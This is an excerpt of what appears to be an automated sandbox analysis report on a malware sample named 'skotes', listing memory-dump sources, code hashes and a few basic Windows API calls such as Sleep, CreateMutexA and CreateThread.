                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dd3683a8c74566ce0fd99dbc5e21a2bb4275d87089d58cfccadb4c4273666703
                                                                                                                                                                                                                                          • Instruction ID: a7c36756b4fcba9ea8ce4a12861f6802880a1fac205328fe3a08ac68f5db2014
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd3683a8c74566ce0fd99dbc5e21a2bb4275d87089d58cfccadb4c4273666703
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 652106B290C1087AEB116B68DC42F9F37A9DF43338F180395F9246B1C1DBB09E0596A1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 7339eac06c4405651572318badc59ce463c82ee29c23059bc2735bff7c7cc009
                                                                                                                                                                                                                                          • Instruction ID: c19de2491727589cdd48fbd07849732276bfb78e57b3c48e1602e897f02f544e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7339eac06c4405651572318badc59ce463c82ee29c23059bc2735bff7c7cc009
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E0861169E30195FA50B26D6865B2DE7D4C7D7B00F210A65A76CC70D29EA0D640C523
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00B86D10
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 00B86D25
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateSleepThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4202482776-0
                                                                                                                                                                                                                                          • Opcode ID: 2e61092526aac27f3b96f08d0e9d2bbbd6b510d4f1faf53eac17f61d6c667906
                                                                                                                                                                                                                                          • Instruction ID: 0fbd8f4b7a831be418c4137c0095b8c95322f9f8127701e6f64b54c97cbd81e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e61092526aac27f3b96f08d0e9d2bbbd6b510d4f1faf53eac17f61d6c667906
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CD012307C4318F6F22022602C07F16AA609B0AF01F264080B3483F0E086E431008BA8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00BA705B,?,?,00000000,00000000), ref: 00BA7166
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$LocalSpecificSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2574697306-0
                                                                                                                                                                                                                                          • Opcode ID: 697882259d10a90f49a7a9d1110ad4e9758bfecf8a830db476c115b0a9234f93
                                                                                                                                                                                                                                          • Instruction ID: d4448dfe20a39f51c41144a8ffdf67b63453037522f9c2f57c4f227def10aa7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 697882259d10a90f49a7a9d1110ad4e9758bfecf8a830db476c115b0a9234f93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B711FE7294810DABDB10DE95CD81EDFB7FCAF09310F6152A6E511F2180EB30EA49CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
